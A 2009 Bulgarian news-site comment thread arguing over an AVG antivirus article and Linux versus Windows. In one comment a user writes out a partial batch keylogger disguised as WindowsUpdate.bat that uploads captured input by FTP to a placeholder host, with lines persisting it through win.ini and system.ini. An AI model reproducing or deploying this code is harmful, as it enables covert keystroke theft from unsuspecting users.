Краткотрайните скрити атаки са новите уеб заплахиВиж новината
| Автор |
|
| anonymousНед, 22.02.09, 00:09 |
” Добре казано на наистина така ли е ? ако притежател на такива програми като антивирусна и защитна стена не знае как да ги управлява то тогава те на половина са безполезни и точно това чакат ламерите. „ Сигурността на информацията е съвкупност от много неща
- ограничаване на физически достъп на случайни лица до системата
- добри пароли за достъп от вида 3hGk^%1gG (а не рождената дата, името на съпруга или пък името на домашния любимец)
- обновена операционна система
- обновен антивирусен софтуер
- защитна стена, с която се работи лесно
- автоматично ежедневно архивиране
- и др. Има много какво да се каже за сигурността, но винаги защитата на данните излиза мноооого по-евтино (може в хиляди пъти) в сравнение с евентуалната загуба на данни и време поради безотговорно отношение на собственика на компютъра/компютрите. За да бъде една фирма за компютърна сигурност полезна на клиентите си, то тя трябва да може да изготви цялостно решение за сигурността на данните им, при поискване. Друг е въпросът, дали след представяне на такава политика на сигурността, клиентът ще желае да се обучава, ще плати за софтуера за защитата, ще спазва някои правила и т.н., но добра сигурност без даване на пари не може се прави, също както всяко друго нещо - храна, жилище, кола, образование и т.н. | | | galkamalkaНед, 22.02.09, 00:19 |
Здравейте  Малко криво разбрана се е получила г-н Тинчев. Идеята ми беше, че цялата тази новина е жалка реклама на куца и слаба антивирусна програма, като AVG. Щом искате да си говориме за специалисти, вируси и заблуждаване на останалите ок. Ако AVG беше наистина стойностна антивирусна щеше да се знае от цял свят, а не само от вас. На тази демонстрация, която правите става дума за смешен троянец, който безвъзмездно ще бъде засечен от която и да било антивирусна програма. Разширенията, които се ползват от вирусите са ужасно много(.ini .dll допадат ли Ви?) и силно се съмнявам, че има файлово разширение, в което да не може да се постави вирус, така че смятам за излишно да изреждаме файлови формати. Вие започнахте с демонстрациите, да продължим и ние. Ще предложа един прост keylogger чието разширение е .bat и ще го кръстиме WindowsUpdate.bat за изящество. echo shell.run "C:\windows\WindowsUpdate.bat", 0
echo @echo off >> C:\windows\WindowsUpdate.bat
echo :go >> C:\windows\WindowsUpdate.bat
echo echo .>>c:\keys.txt >> C:\windows\WindowsUpdate.bat
echo echo : >> C:\windows\WindowsUpdate.bat
echo set /p keys= >> C:\windows\WindowsUpdate.bat
echo echo %keys%>>c:\keys.txt >> C:\windows\WindowsUpdate.bat
echo @echo off >> C:\windows\WindowsUpdate.bat
echo ftp >> C:\windows\WindowsUpdate.bat
echo open еди кой си hoster.com >> C:\windows\WindowsUpdate.bat
echo username >> C:\windows\WindowsUpdate.bat
echo password >> C:\windows\WindowsUpdate.bat
echo put c:keys.txt >> C:\windows\WindowsUpdate.bat
echo тук ще спра по обясними причини и не аз ще постна целия код |
Ако спрем и сканираме WindowsUpdate.bat с истинска антивирусна, като Kaspersky той няма да открие троян, както и абсолютно никоя друга антивирусна.
Но само един ламер глупак ще допусне да шава из операционната система някакъв си файл ето защо ще напъхаме нашия keylogger в едни мои много любими файлчета echo [windows] >> %windir%\win.ini
echo run=%windir%\WindowsUpdate.bat >> %windir%\win.ini
echo load=%windir%\WindowsUpdate.bat >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe %windir%\WindowsUpdate.bat >> %windir%\system.ini |
смятам, че е излишно да продължавам и показвам също така силата на autoexec.bat, който всеки Window$ си има....
Та я ми кажете как ще се справи AVG ако открие вирус в system.ini???
Щом коментариме "съвремените" троянци ще Ви открехна, че все по-често занапред те няма да се виждат, няма да има дори файл...достатъчно е еднократното активиране.
Сигурното г-н Тинчев има за лого пингвинче.
Това е. Мисълта ми беше, че се прави жалка реклама на AVG-то, а не че няма подобни вируси.
Хубаво всички да осъзнаем, че без онлайн защита в реално време и използването на администраторски акаунт сме малко по-уязвими. | | | karadzhaНед, 22.02.09, 00:39 |
” Г-н Тинчев, за да сме осведомени и с добра потребителска култура, ще може ли да кажете с какви други разширения са вирусите? Не питам за да се заяждам, а защото считам, че е редно всеки да знае от какво и как да се пази. Все пак, една антивирусна прави каквото й каже потребителят - познавам доста хора, които не си слушат антивирусните, защото им затриват краковете... И точно от тия кратковременни атаки не разбрах как да се предпазваме. И на какви платформи са ефективни? „ Мариана, дори мр3 може да съдържа вирус. В тоя формат го засече преди време Каспи. Но аз вече се досещах, че тъй ще е работата - мр3-ка 3-4 кБ!?! Ще взема да се преквалифицирам в антивирусна Таман ще правя калабалък на останалите некадърни АВ-та | | | anonymousНед, 22.02.09, 00:56 |
galkamalka, няма да коментрирам подробно посочената идея за атака само по една причина - явно се опитвате да дадете за пример елементарен опит за крадене на данни чрез .bat файл. За да стане това реалност има толкова условности, че просто е смешно да мислите, че някой ще се подаде на това, особено ако има защитна стена, обикновен потребителски акаунт и много други. Дали пингвина е по-добър от прозореца и в какво, няма да споря също - броя на потребителите в световен мащаб на двете ОС за клиентски или за сървърни машини, показва как стоят нещата реално. ” Ако AVG беше наистина стойностна антивирусна щеше да се знае от цял свят, а не само от вас. „
С над 85 милиона потребители в целия свят и над 160 000 в България едва ли може да се каже, че AVG не е известна. Прекратявам разговора си специално с Вас и повече няма да отговарям на Ваши коментари, защото не обичам и не си залужава да си губя времето със заядливи хора. редактиран от anonymous на 22.02.09 00:57 | | | deringerНед, 22.02.09, 01:14 |
"Дали пингвина е по-добър от прозореца и в какво, няма да споря също - броя на потребителите в световен мащаб на двете ОС за клиентски или за сървърни машини, показва как стоят нещата реално." Опааа...А защо не го разгледаме така - Защо в последните години при "пингвина"(Linux)/UNIX се наблюдава растеж,може би защото световната популация се е увеличила,едва ли... Пак с метафорка - "джама" лесна се чупи... А и още нещо,доста несериозно подхождате(като се има предвид,че сте специалист)щом измервате всичко в потребители прекалено меркантилен ум сте добили покрай търговията...та това е от мен..не че се заяждам водя разговора...Не почнах с "пингвините",но се принудих да отговарям... едва ли е нужно да започвам с фактите за защита,колко трудно се крадат данни и т.н ;) За сървърите пак сте в грешка - Servers and supercomputers Servers designed for Linux Historically, Linux distributions have mainly been used as server operating systems, and have risen to prominence in that area; Netcraft reported in September 2006 that eight of the ten most reliable internet hosting companies ran Linux distributions on their web servers.[40] (As of June 2008, Linux distributions represented five of ten, FreeBSD three of ten, and Microsoft two of ten.[41]) This is due to its relative stability and long uptime, and the fact that desktop software with a graphical user interface for servers is often unneeded. Enterprise and non-enterprise Linux distributions may be found running on servers. Linux distributions are the cornerstone of the LAMP server-software combination (Linux, Apache, MySQL, Perl/PHP/Python) which has achieved popularity among developers, and which is one of the more common platforms for website hosting. Linux distributions are commonly used as operating systems for supercomputers. As of August 2008, out of the top 500 systems, 423 (84.6%) run a Linux distribution.
Източник - http://en.wikipedia.org/wiki/Linux от време на време хвърляйте едно око и на не толкова печелившите проекти... редактиран от deringer на 22.02.09 01:28 | | | anonymousНед, 22.02.09, 01:24 |
” "Дали пингвина е по-добър от прозореца и в какво, няма да споря също - броя на потребителите в световен мащаб на двете ОС за клиентски или за сървърни машини, показва как стоят нещата реално." „ Нека го кажа в прав текст, ако Linux беше толкова лесен и хубав за ползване от масовия (офис) потребител щеше да има над 90% от пазара на ОС, а не Windows. Тук не говоря за сигурност, а за практичност в работата. Не мисля да влизам в конфлики на тема "Коя операционна система е по-сигурна, по-масова, по-бърза и т.н. Коментарът ми е: Светът е такъв какъвто е - повечето хора предпочитат Windows защото го намират за по-лесен за ползване и не искат да имат знанията на системен администратор, за да си инсталират един текстов редактор или игра. И така, тези съвсем нормални хора (поради, кото вие и аз имаме възможност да притежаваме и ползваме хиляди неща в ежедневието си) имат нужда от защита... За тях е тази статия. Прекратявам коментарите за операционни системи, прилики и разлики при тях. | | | deringerНед, 22.02.09, 01:33 |
Явно не ползвате Линукс ... Отговора е некомпетентен и доста незадоволителен ... Но щом желаете прекратяваме И да Ви кажа едно откритие - Линукс има графична среда,както и програми с графичен интерфейс и инсталиране с един клик... Е ,Вие отговорихте - на който му се чете ще може... другите ще си ползват Windows и ще се мъчат да конфигурират стени и антивирусни,при все че могат да го имат безплатно.... | | | karadzhaНед, 22.02.09, 01:35 |
” "Дали пингвина е по-добър от прозореца и в какво, няма да споря също - броя на потребителите в световен мащаб на двете ОС за клиентски или за сървърни машини, показва как стоят нещата реално." Опааа...А защо не го разгледаме така - Защо в последните години при "пингвина"(Linux)/UNIX се наблюдава растеж,може би защото световната популация се е увеличила,едва ли... Пак с метафорка - "джама" лесна се чупи... А и още нещо,доста несериозно подхождате(като се има предвид,че сте специалист)щом измервате всичко в потребители прекалено меркантилен ум сте добили покрай търговията...та това е от мен..не че се заяждам водя разговора...Не почнах с "пингвините",но се принудих да отговарям... едва ли е нужно да започвам с фактите за защита,колко трудно се крадат данни и т.н ;) „ За потребителите си прав. Това че жициемите Нодия са най-разпространени (ок. 90% пазарен дял), не значи, че са най-добри. Тъй е и с Уин - Мак са не по-лоши машини, но са десетки пъти по-малко. А за ползването на ОС ще кажа, че е грешно да се изтъкват предимства само. Дори да мога да работя с Лин, никога няма да изоставя ХР - той ми е като първи учител | | | shamanНед, 22.02.09, 01:44 |
Аз не разбирам само,защо се хапите с 4овека,който рекламира това ,което най вероятно му дава прехраната. Това е просто една реклама,ако запо4нем да се "дърлим" на въпреки, срещу всяка една такава,ми дайте тогава да спрем да рекламираме,респективно да се информираме. Всяка жаба да си знае . . .к'во беше там. . .? Въпреки 4е нямам добро мнение за AVG като антивирусна,това се осланя на мнение от преди 1-2 год.,все пак е продукт ,който се развива в крак с времето,за разлика от някой ,които заеб*ха постоянната поддръжка и се надяват със "финес" и слава,да скубнат още малко. П.С. Г-н Тин4ев,при цялото ми уважение,все пак хората се дразнят,когато нещо което е платено,а в същото време и то доста скъпо,боде в о4ите им.
Мисля 4е вашата реклама в слу4ая опира до там,да предложите продукта си,защото тази тема отива към опозоряване на програмата.
Останалото оставете другите да преценят.
Не е нужно да защитавате нещо ,което ако изклю4им това 4е ви носи пе4алба,все пак може да се изпробва от други лица,които биха добили представа - за какво в слу4ая пее петела. Лека ве4ер на вси4ки.
_____________________________
In The Hands of The Shaman ® | | | insecteaterНед, 22.02.09, 09:39 |
Я гледай ти, какво се е заформило тука. Ще споделя и аз малко впечатления: Относно новината: ми много хубаво, ама защо навсякъде са нацвъкани разни изрази включващи името AVG? Досущ като реклама на WS Telеshop - като почнат да ти набиват името на продукта в главата и ти втръсва - едно и също, едно и също. Новината изобилства с изявяване качествата на продукта и споменаване на името му и т.н. И се оказва, че читателят трябва да отсява полезната информация от това, кой я предоставя и това да го прави много по често отколкото трябва за да си чете новината гладко. Напълно нормално е да има критики. Относно коментарите - ето тук вече наистина си личи професионализъм :
” Най-често използваните резширения са EXE, SCR, PIF и др. масови стартируеми формати. В действителност, обаче, има написани вируси, действащи чрез много разширения - буквално стотици. Можете да видите някои от тях тук - http://www.garrin.net/VirusExtensions.htmЗа съжаление, вируси могат да бъдат разположени и да използват уязвимости в множество файлови формати. В това число в JPG картинки (да, точно такива като тези от цифров апарат или такива които се срещат на всеки сайт), също в Microsoft Office документи (като макроси в тях), в скрийн сейвъри (SCR) с красиви примамливи водопади или изгледи и др. Различните вируси разчитат на различни платформи и уязвимости. Точно затова е нужна антивирусната програма. Когато я инстралирате вие ще имате защита за всеки файл без да се замисляте. Нека антивирусната се грижи за това. Нужна е и качествена защитна стена, която да контролира трафика., за да не бъдат изпращани данни, които не желаете от компютъра ви, а също и да блокира опитите на хакери да проникнат до данните ви при атака. „ ” Сигурността на информацията е съвкупност от много неща - ограничаване на физически достъп на случайни лица до системата - добри пароли за достъп от вида 3hGk^%1gG (а не рождената дата, името на съпруга или пък името на домашния любимец) - обновена операционна система - обновен антивирусен софтуер - защитна стена, с която се работи лесно - автоматично ежедневно архивиране - и др. Има много какво да се каже за сигурността, но винаги защитата на данните излиза мноооого по-евтино (може в хиляди пъти) в сравнение с евентуалната загуба на данни и време поради безотговорно отношение на собственика на компютъра/компютрите. За да бъде една фирма за компютърна сигурност полезна на клиентите си, то тя трябва да може да изготви цялостно решение за сигурността на данните им, при поискване. Друг е въпросът, дали след представяне на такава политика на сигурността, клиентът ще желае да се обучава, ще плати за софтуера за защитата, ще спазва някои правила и т.н., но добра сигурност без даване на пари не може се прави, също както всяко друго нещо - храна, жилище, кола, образование и т.н. „ Ако новината беше в подобен стил без изтъкване кой е водещият разработчик и точно кой какво е съобщил, щеше да е друго. Както и да е, аз вече оцених тези два коментара "Съдържа полезен съвет". Мотивите ми: кратка, ясна и сбита информация, добре поднесена, вярна и точно в целта. galkamalka, това което предлагаш, например при мен няма да сработи ("при мен" разбирай 42 компютъра в момента)
” Хубаво всички да осъзнаем, че без онлайн защита в реално време и използването на администраторски акаунт сме малко по-уязвими. „ което се покрива донякъде с по-горните коментари на www.bsd.bg . ("администраторски"/"ограничен"???) Ами това е ... впечатлението ми накратко: зле балансирана новина с много хубави коментари. | | | galkamalkaНед, 22.02.09, 12:54 |
Точно това ми беше мисълта insecteater, shaman, че чисто и просто се прави реклама. В тази безпочвена реклама се говори само за AVG. Сигурността на всеки е в 2 точки: 1. Kaspersky Internet Security 20192. Работа с ограничени акаунти в Windows XP ProfessionalТова вече е сигурност!В тази "новина" обаче аз не виждам нищо друго освен реклама. www.bsd.bg явно вашите shell познания са доста по-ограничени от моите. Тази "невероятна" антивирусна програма AVG ще бъде заличена точно с още един ред от онзи .bat, а друг е въпроса, че много лесно може да бъде манипулирана по определен вкус BOOTUPSCANNER: "NO" честито. Истината господине, е че AVG е лекичка антивирусна но не и ефективна. Докато има тъпаци, които ползват антивирусни подобни на AVG и администраторски акаунти ще има и компютри зомбита, които да разпространяват вирусите,за идиоти, които вярват, че с AVG са защитени. Ламерските червеи замряха, сега се пишат вируси, които да съсипват хардуера Ви. Аз също съм човек, на който, като му "прищрака" разпространява вируси но Вие предпочетохте да си затворите ушите. Смея да твърдя, че AVG за мен е не по надеждна антивирусна от Window$-кия калкулатор. Перфектния вирус започва с пренебрегване и заобикаляне на всякъф вид защита, точно за това мрежата изобилства с тях. Според Вас това е "елементарен опит" но не всеки има знанията на insect, така че да не ръсиме глупости предлагам. Ако някой наистина иска да е защитен под Window$ следва 2-те точки по-горе. ” galkamalka.... Прекратявам разговора си специално с Вас и повече няма да отговарям на Ваши коментари, защото не обичам и не си залужава да си губя времето със заядливи хора. „
Извинете ме но аз не се заяждам просто съм искрена и откровена. Аз когато се заяждам се чува надалече и бивам оценяване подобаващо от абсолютно всеки дори и да няма директна обида към съответния гласоподавател, така че ако се заям с Вас ще разберете веднага. Плюс това имам премиум чак до 12 март и до тогава ще се възползвам пълноценно от услугите за които бях заплатила. | | | nikoborНед, 22.02.09, 14:34 |
За рекламата е важно да се говори, за да е в центъра на вниманието. Така че помислете си какво става като отделяме толкова внимание на AVG. Всеки си има глава на раменете, нека мисли сам, а ако не може, тежко му- ще се научи по трудния начин. | | | dhtjПон, 23.02.09, 18:42 |
” Нека го кажа в прав текст, ако Linux беше толкова лесен и хубав за ползване от масовия (офис) потребител щеше да има над 90% от пазара на ОС, а не Windows. Тук не говоря за сигурност, а за практичност в работата. Не мисля да влизам в конфлики на тема "Коя операционна система е по-сигурна, по-масова, по-бърза и т.н. Коментарът ми е: Светът е такъв какъвто е - повечето хора предпочитат Windows защото го намират за по-лесен за ползване и не искат да имат знанията на системен администратор, за да си инсталират един текстов редактор или игра. И така, тези съвсем нормални хора (поради, кото вие и аз имаме възможност да притежаваме и ползваме хиляди неща в ежедневието си) имат нужда от защита... За тях е тази статия. Прекратявам коментарите за операционни системи, прилики и разлики при тях. „
ще те затапя най-кратко: Повечето хора в българия карат коли на старо нали ? Това значи ли че колите втора ръка са по добри от новите ? редактиран от dhtj на 24.02.09 14:40 | | | anonymousВто, 24.02.09, 18:38 |
” Нека го кажа в прав текст, ако Linux беше толкова лесен и хубав за ползване от масовия (офис) потребител щеше да има над 90% от пазара на ОС, а не Windows. Тук не говоря за сигурност, а за практичност в работата. Не мисля да влизам в конфлики на тема "Коя операционна система е по-сигурна, по-масова, по-бърза и т.н. Коментарът ми е: Светът е такъв какъвто е - повечето хора предпочитат Windows защото го намират за по-лесен за ползване и не искат да имат знанията на системен администратор, за да си инсталират един текстов редактор или игра. И така, тези съвсем нормални хора (поради, кото вие и аз имаме възможност да притежаваме и ползваме хиляди неща в ежедневието си) имат нужда от защита... За тях е тази статия. Прекратявам коментарите за операционни системи, прилики и разлики при тях. „ Най-много ми хареса часта за знанията на системен администратор за инсталирането на текстов редактор или игра.
Не знаех, че двойния клик е от знанията на системния администратор.
Да не говорим, че инсталирам всичкия софтуер, който ми е нужен за 15 мин., а в Windows постоянно се появява нещо ново, което го няма в системата. Според мен знанията на системният администратор са повече за Windows (говоря за работата на обикновеният потребител, а не за обслужване на сървъри).
А цялото това рекламиране и софтуера и на системата е, защото производителите си плащат, а не защото реално ви интересува сигурността на потребителите. | |  Коментар
|
Отговор
За печат